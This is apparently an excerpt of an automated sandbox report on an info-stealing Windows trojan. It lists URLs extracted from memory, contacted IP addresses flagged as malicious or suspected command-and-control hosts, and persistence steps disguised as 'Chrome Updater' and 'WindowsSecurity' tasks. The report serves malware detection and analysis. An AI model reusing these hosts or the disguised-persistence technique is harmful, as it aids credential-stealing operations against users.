http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecret	AppLaunch.exe, 00000005.00000002.1826314997.00000000064BA000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.000000000257A000.00000004.00000800.00020000.00000000.sdmp, 9AED.exe, 00000018.00000002.2633753789.0000000002595000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue	AppLaunch.exe, 00000005.00000002.1826314997.00000000064BA000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.000000000257A000.00000004.00000800.00020000.00000000.sdmp, 9AED.exe, 00000018.00000002.2633753789.0000000002595000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY	explorer.exe, 0000000B.00000000.1721922206.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/10/wsat/Aborted	AppLaunch.exe, 00000005.00000002.1826314997.00000000064BA000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.000000000257A000.00000004.00000800.00020000.00000000.sdmp, 9AED.exe, 00000018.00000002.2633753789.0000000002595000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence	AppLaunch.exe, 00000005.00000002.1826314997.0000000006421000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.00000000024E1000.00000004.00000800.00020000.00000000.sdmp, 9AED.exe, 00000018.00000002.2633753789.0000000002531000.00000004.00000800.00020000.00000000.sdmp	false		high
http://18.218.18.183:80	8F82.exe, 00000013.00000002.2006862081.0000019433F41000.00000004.00000800.00020000.00000000.sdmp, 8F82.exe, 0000001C.00000002.2066577791.00000135CB661000.00000004.00000800.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://66.42.56.128:80	8F82.exe, 00000013.00000002.2006862081.0000019433F41000.00000004.00000800.00020000.00000000.sdmp, 8F82.exe, 0000001C.00000002.2066577791.00000135CB661000.00000004.00000800.00020000.00000000.sdmp	false	7%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://tempuri.org/Entity/Id13ResponseD	AppLaunch.exe, 00000005.00000002.1826314997.0000000006968000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.000000000257A000.00000004.00000800.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2004/10/wsat/fault	AppLaunch.exe, 00000005.00000002.1826314997.00000000064BA000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.000000000257A000.00000004.00000800.00020000.00000000.sdmp, 9AED.exe, 00000018.00000002.2633753789.0000000002595000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/10/wsat	AppLaunch.exe, 00000005.00000002.1826314997.00000000064BA000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.000000000257A000.00000004.00000800.00020000.00000000.sdmp, 9AED.exe, 00000018.00000002.2633753789.0000000002595000.00000004.00000800.00020000.00000000.sdmp	false		high
https://18.179.137.198:443	8F82.exe, 00000013.00000002.2006862081.0000019433F41000.00000004.00000800.00020000.00000000.sdmp, 8F82.exe, 0000001C.00000002.2066577791.00000135CB661000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://64.227.21.98:443	8F82.exe, 00000013.00000002.2006862081.0000019433F41000.00000004.00000800.00020000.00000000.sdmp, 8F82.exe, 0000001C.00000002.2066577791.00000135CB661000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://tempuri.org/Entity/Id15Response	AppLaunch.exe, 00000005.00000002.1826314997.0000000006421000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.00000000024E1000.00000004.00000800.00020000.00000000.sdmp	false	2%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	AppLaunch.exe, 00000005.00000002.1826314997.00000000064BA000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.00000000025D0000.00000004.00000800.00020000.00000000.sdmp, 8F82.exe, 00000013.00000002.2006862081.000001943435E000.00000004.00000800.00020000.00000000.sdmp, 9AED.exe, 00000018.00000002.2633753789.0000000002595000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ipinfo.io/a%	AppLaunch.exe, 00000009.00000002.2015163150.000000000526A000.00000004.00000020.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Renew	AppLaunch.exe, 00000005.00000002.1826314997.00000000064BA000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.000000000257A000.00000004.00000800.00020000.00000000.sdmp, 9AED.exe, 00000018.00000002.2633753789.0000000002595000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/10/wscoor/Register	AppLaunch.exe, 00000005.00000002.1826314997.00000000064BA000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.000000000257A000.00000004.00000800.00020000.00000000.sdmp, 9AED.exe, 00000018.00000002.2633753789.0000000002595000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKey	AppLaunch.exe, 00000005.00000002.1826314997.00000000064BA000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.000000000257A000.00000004.00000800.00020000.00000000.sdmp, 9AED.exe, 00000018.00000002.2633753789.0000000002595000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.autoitscript.com/autoit3/J	explorer.exe, 0000000B.00000000.1733312521.000000000C964000.00000004.00000001.00020000.00000000.sdmp	false		high
https://wns.windows.com/L	explorer.exe, 0000000B.00000000.1733312521.000000000C557000.00000004.00000001.00020000.00000000.sdmp	false		high
https://api.ip.sb/ip	AppLaunch.exe, 00000005.00000002.1826314997.0000000006421000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.00000000024E1000.00000004.00000800.00020000.00000000.sdmp, 9AED.exe, 00000018.00000002.2633753789.0000000002531000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://duckduckgo.com/?q=	9AED.exe, 00000018.00000003.2560173451.000000000402D000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Entity/Id1ResponseD	AppLaunch.exe, 00000005.00000002.1826314997.00000000064BA000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.000000000257A000.00000004.00000800.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings	explorer.exe, 0000000B.00000000.1721922206.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		high
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu	explorer.exe, 0000000B.00000000.1721922206.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Cancel	AppLaunch.exe, 00000005.00000002.1826314997.00000000064BA000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.000000000257A000.00000004.00000800.00020000.00000000.sdmp, 9AED.exe, 00000018.00000002.2633753789.0000000002595000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-win	explorer.exe, 0000000B.00000000.1721922206.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	AppLaunch.exe, 00000005.00000002.1830858383.00000000081DB000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000005.00000002.1830858383.00000000080A5000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000005.00000002.1830858383.0000000008132000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000005.00000002.1830858383.0000000008018000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000005.00000002.1826314997.00000000069A7000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000005.00000002.1830858383.0000000008034000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000005.00000002.1826314997.00000000069DF000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000005.00000002.1826314997.0000000006AD3000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000005.00000002.1826314997.0000000006A75000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000005.00000002.1830858383.0000000007FA6000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000005.00000002.1826314997.0000000006A3D000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000005.00000002.1830858383.000000000824C000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000005.00000002.1830858383.00000000081BF000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000005.00000002.1830858383.0000000007F8B000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000005.00000002.1830858383.000000000814E000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000005.00000002.1830858383.00000000080C1000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000005.00000002.1830858383.0000000008268000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.00000000029C7000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.0000000002933000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.00000000028FD000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.0000000002969000.00000004.00000800.00020000.00000000.sdmp	false		high
https://t.me/RiseProSUPPORT	AppLaunch.exe, 00000009.00000002.2015163150.000000000526A000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000009.00000002.2031135122.00000000086DB000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000009.00000002.2031135122.000000000869B000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000009.00000002.2031135122.000000000867F000.00000004.00000020.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1	AppLaunch.exe, 00000005.00000002.1826314997.00000000064BA000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.000000000257A000.00000004.00000800.00020000.00000000.sdmp, 9AED.exe, 00000018.00000002.2633753789.0000000002595000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Entity/Id24Response	AppLaunch.exe, 00000005.00000002.1826314997.0000000006421000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.00000000024E1000.00000004.00000800.00020000.00000000.sdmp	false	2%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.ecosia.org/newtab/	AppLaunch.exe, 00000005.00000002.1830858383.00000000081DB000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000005.00000002.1830858383.00000000080A5000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000005.00000002.1830858383.0000000008132000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000005.00000002.1830858383.0000000008018000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000005.00000002.1826314997.00000000069A7000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000005.00000002.1830858383.0000000008034000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000005.00000002.1826314997.00000000069DF000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000005.00000002.1826314997.0000000006AD3000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000005.00000002.1826314997.0000000006A75000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000005.00000002.1830858383.0000000007FA6000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000005.00000002.1826314997.0000000006A3D000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000005.00000002.1830858383.000000000824C000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000005.00000002.1830858383.00000000081BF000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000005.00000002.1830858383.0000000007F8B000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000005.00000002.1830858383.000000000814E000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000005.00000002.1830858383.00000000080C1000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000005.00000002.1830858383.0000000008268000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.00000000029C7000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.00000000028FD000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.0000000002969000.00000004.00000800.00020000.00000000.sdmp, 9AED.exe, 00000018.00000003.2560173451.0000000004161000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-	explorer.exe, 0000000B.00000000.1721922206.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequested	AppLaunch.exe, 00000005.00000002.1826314997.0000000006421000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.00000000024E1000.00000004.00000800.00020000.00000000.sdmp, 9AED.exe, 00000018.00000002.2633753789.0000000002531000.00000004.00000800.00020000.00000000.sdmp	false		high
http://52.86.18.77:8080	8F82.exe, 00000013.00000002.2006862081.0000019433F41000.00000004.00000800.00020000.00000000.sdmp, 8F82.exe, 0000001C.00000002.2066577791.00000135CB661000.00000004.00000800.00020000.00000000.sdmp	false	7%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnego	AppLaunch.exe, 00000005.00000002.1826314997.00000000064BA000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.000000000257A000.00000004.00000800.00020000.00000000.sdmp, 9AED.exe, 00000018.00000002.2633753789.0000000002595000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu	explorer.exe, 0000000B.00000000.1721922206.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		high
http://216.39.242.18:8080	8F82.exe, 00000013.00000002.2006862081.0000019433F41000.00000004.00000800.00020000.00000000.sdmp, 8F82.exe, 0000001C.00000002.2066577791.00000135CB661000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://tempuri.org/Entity/Id21ResponseD	AppLaunch.exe, 00000005.00000002.1826314997.0000000006886000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.000000000257A000.00000004.00000800.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2004/08/addressing	AppLaunch.exe, 00000005.00000002.1826314997.0000000006421000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.00000000024E1000.00000004.00000800.00020000.00000000.sdmp, 9AED.exe, 00000018.00000002.2633753789.0000000002531000.00000004.00000800.00020000.00000000.sdmp	false		high
https://blog.torproject.org/v2-deprecation-timeline	tor-real.exe, 0000001D.00000000.2123708088.0000000000F76000.00000002.00000001.01000000.00000015.sdmp	false		high
https://ipinfo.io/	4ZZ099qJ.exe, AppLaunch.exe, 00000009.00000002.2015163150.00000000052B2000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000009.00000002.2015163150.00000000052BF000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000009.00000002.2015163150.000000000526A000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.rd.com/list/polite-habits-campers-dislike/	explorer.exe, 0000000B.00000000.1721922206.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		high
https://blog.torproject.org/blog/lifecycle-of-a-new-relayCan	tor-real.exe, 0000001D.00000000.2123708088.0000000000F76000.00000002.00000001.01000000.00000015.sdmp	false		high
http://schemas.xmlsoap.org/wsdl/	8F82.exe, 00000013.00000002.2006862081.0000019433F41000.00000004.00000800.00020000.00000000.sdmp, 8F82.exe, 0000001C.00000002.2066577791.00000135CB661000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue	AppLaunch.exe, 00000005.00000002.1826314997.00000000064BA000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.000000000257A000.00000004.00000800.00020000.00000000.sdmp, 9AED.exe, 00000018.00000002.2633753789.0000000002595000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.torproject.org/download/download#warning	tor-real.exe, 0000001D.00000000.2123708088.0000000000F76000.00000002.00000001.01000000.00000015.sdmp	false		high
http://tempuri.org/Entity/Id10ResponseD	AppLaunch.exe, 00000005.00000002.1826314997.00000000064BA000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.000000000257A000.00000004.00000800.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponse	AppLaunch.exe, 00000005.00000002.1826314997.00000000064BA000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.000000000257A000.00000004.00000800.00020000.00000000.sdmp, 9AED.exe, 00000018.00000002.2633753789.0000000002595000.00000004.00000800.00020000.00000000.sdmp	false		high
https://outlook.com_	explorer.exe, 0000000B.00000000.1733312521.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	low
http://tempuri.org/Entity/Id5Response	AppLaunch.exe, 00000005.00000002.1826314997.0000000006421000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.00000000024E1000.00000004.00000800.00020000.00000000.sdmp	false	2%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://tempuri.org/Contract/MSValue2ResponseD	9AED.exe, 00000018.00000002.2633753789.0000000002595000.00000004.00000800.00020000.00000000.sdmp	false	2%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dns	AppLaunch.exe, 00000005.00000002.1826314997.0000000006421000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.00000000024E1000.00000004.00000800.00020000.00000000.sdmp, 9AED.exe, 00000018.00000002.2633753789.0000000002531000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-at	explorer.exe, 0000000B.00000000.1721922206.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		high
http://45.55.65.93:80	8F82.exe, 00000013.00000002.2006862081.0000019433F41000.00000004.00000800.00020000.00000000.sdmp, 8F82.exe, 0000001C.00000002.2066577791.00000135CB661000.00000004.00000800.00020000.00000000.sdmp	false	3%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://tempuri.org/Entity/Id15ResponseD	7FE0.exe, 00000011.00000002.2156209250.000000000257A000.00000004.00000800.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://tempuri.org/Entity/Id10Response	AppLaunch.exe, 00000005.00000002.1826314997.0000000006421000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.00000000024E1000.00000004.00000800.00020000.00000000.sdmp	false	2%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/02/trust/Renew	AppLaunch.exe, 00000005.00000002.1826314997.00000000064BA000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.000000000257A000.00000004.00000800.00020000.00000000.sdmp, 9AED.exe, 00000018.00000002.2633753789.0000000002595000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Entity/Id8Response	AppLaunch.exe, 00000005.00000002.1826314997.0000000006421000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.00000000024E1000.00000004.00000800.00020000.00000000.sdmp	false	2%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://185.217.98.121:80	8F82.exe, 00000013.00000002.2006862081.0000019433F41000.00000004.00000800.00020000.00000000.sdmp, 8F82.exe, 0000001C.00000002.2066577791.00000135CB661000.00000004.00000800.00020000.00000000.sdmp	false	11%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://ocsp.sectigo.com0	explorer.exe, 0000000B.00000003.2020251955.0000000009B81000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionID	AppLaunch.exe, 00000005.00000002.1826314997.00000000064BA000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.000000000257A000.00000004.00000800.00020000.00000000.sdmp, 9AED.exe, 00000018.00000002.2633753789.0000000002595000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-cl	explorer.exe, 0000000B.00000000.1721922206.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCT	AppLaunch.exe, 00000005.00000002.1826314997.00000000064BA000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.000000000257A000.00000004.00000800.00020000.00000000.sdmp, 9AED.exe, 00000018.00000002.2633753789.0000000002595000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2006/02/addressingidentity	AppLaunch.exe, 00000005.00000002.1826314997.00000000064BA000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.000000000257A000.00000004.00000800.00020000.00000000.sdmp, 9AED.exe, 00000018.00000002.2633753789.0000000002595000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/trust/PublicKey	AppLaunch.exe, 00000005.00000002.1826314997.00000000064BA000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.000000000257A000.00000004.00000800.00020000.00000000.sdmp, 9AED.exe, 00000018.00000002.2633753789.0000000002595000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.micro	explorer.exe, 0000000B.00000000.1723245130.0000000008720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000B.00000000.1722533269.0000000007F40000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000B.00000000.1725227083.0000000009B60000.00000002.00000001.00040000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2004/10/wsat/Rollback	AppLaunch.exe, 00000005.00000002.1826314997.00000000064BA000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.000000000257A000.00000004.00000800.00020000.00000000.sdmp, 9AED.exe, 00000018.00000002.2633753789.0000000002595000.00000004.00000800.00020000.00000000.sdmp	false		high
https://44.228.161.50:443	8F82.exe, 00000013.00000002.2006862081.0000019433F41000.00000004.00000800.00020000.00000000.sdmp, 8F82.exe, 0000001C.00000002.2066577791.00000135CB661000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
194.49.94.210	unknown	unknown	42707	EQUEST-ASNL	true
64.227.21.98	unknown	United States	14061	DIGITALOCEAN-ASNUS	false
194.49.94.152	unknown	unknown	42707	EQUEST-ASNL	true
185.86.150.58	unknown	Latvia	52173	MAKONIXLV	false
23.83.132.19	unknown	United States	19148	LEASEWEB-USA-PHX-11US	false
37.120.174.249	unknown	Germany	197540	NETCUP-ASnetcupGmbHDE	false
188.241.240.27	unknown	Romania	39543	TENNET-ASRO	false
162.159.135.233	cdn.discordapp.com	United States	13335	CLOUDFLARENETUS	false
149.154.167.99	t.me	United Kingdom	62041	TELEGRAMRU	false
164.90.185.9	unknown	United States	14061	DIGITALOCEAN-ASNUS	false
149.154.167.220	api.telegram.org	United Kingdom	62041	TELEGRAMRU	false
52.86.18.77	unknown	United States	14618	AMAZON-AESUS	false
147.135.36.89	ipwho.is	United States	16276	OVHFR	false
194.169.175.235	unknown	Germany	43659	CLOUDCOMPUTINGDE	true
185.196.9.161	unknown	Switzerland	42624	SIMPLECARRIERCH	true
194.49.94.72	unknown	unknown	42707	EQUEST-ASNL	true
104.21.35.168	trecube.com	United States	13335	CLOUDFLARENETUS	false
104.21.89.193	central-cee-doja.ru	United States	13335	CLOUDFLARENETUS	false
20.29.134.23	github.com	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
194.49.94.145	unknown	unknown	42707	EQUEST-ASNL	true
194.49.94.120	unknown	unknown	42707	EQUEST-ASNL	true
94.23.194.134	unknown	France	16276	OVHFR	false
34.117.59.81	ipinfo.io	United States	139070	GOOGLE-AS-APGoogleAsiaPacificPteLtdSG	false
195.10.205.16	unknown	Russian Federation	35813	TSSCOM-ASRU	false
144.91.125.239	unknown	Germany	51167	CONTABODE	false
185.217.98.121	unknown	Israel	61102	INTERHOSTIL	false
85.214.85.187	unknown	Germany	6724	STRATOSTRATOAGDE	false
208.95.112.1	ip-api.com	United States	53334	TUT-ASUS	false
206.189.109.146	unknown	United States	14061	DIGITALOCEAN-ASNUS	false
5.42.65.80	unknown	Russian Federation	39493	RU-KSTVKolomnaGroupofcompaniesGuarantee-tvRU	true
185.199.108.133	objects.githubusercontent.com	Netherlands	54113	FASTLYUS	false
194.49.94.80	unknown	unknown	42707	EQUEST-ASNL	true
217.145.238.175	unknown	Sweden	201971	CREEPERHOSTLTD-ASGB	false

Private

IP
127.0.0.1

General Information

Joe Sandbox Version:	38.0.0 Ammolite
Analysis ID:	1344493
Start date and time:	2023-11-18 10:01:05 +01:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 13m 52s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	54
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	2
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample file name:	jtfCFDmLdX.exe renamed because original name is a hash value
Original Sample Name:	b70f4854e1ecf7923fb88ed64198068a.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@90/99@11/34
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 93% Number of executed functions: 128 Number of non-executed functions: 179
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, Conhost.exe, consent.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing network information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtCreateFile calls found.
Report size getting too big, too many NtDeviceIoControlFile calls found.
Report size getting too big, too many NtEnumerateKey calls found.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Report size getting too big, too many NtSetInformationFile calls found.

Simulations

Behavior and APIs

Time	Type	Description
09:02:34	Task Scheduler	Run new task: 8F82 path: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe
09:02:53	Task Scheduler	Run new task: IdentityReference path: C:\Users\user\AppData\Roaming\ReferencedAssembly\IdentityReference.exe
09:02:53	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Chrome Updater.lnk
09:04:04	Task Scheduler	Run new task: GoogleUpdateTaskMachineQC path: C:\Program Files\Google\Chrome\updater.exe
10:02:05	API Interceptor	29x Sleep call for process: AppLaunch.exe modified
10:02:07	API Interceptor	119943x Sleep call for process: explorer.exe modified
10:02:28	API Interceptor	19879x Sleep call for process: 8427.exe modified
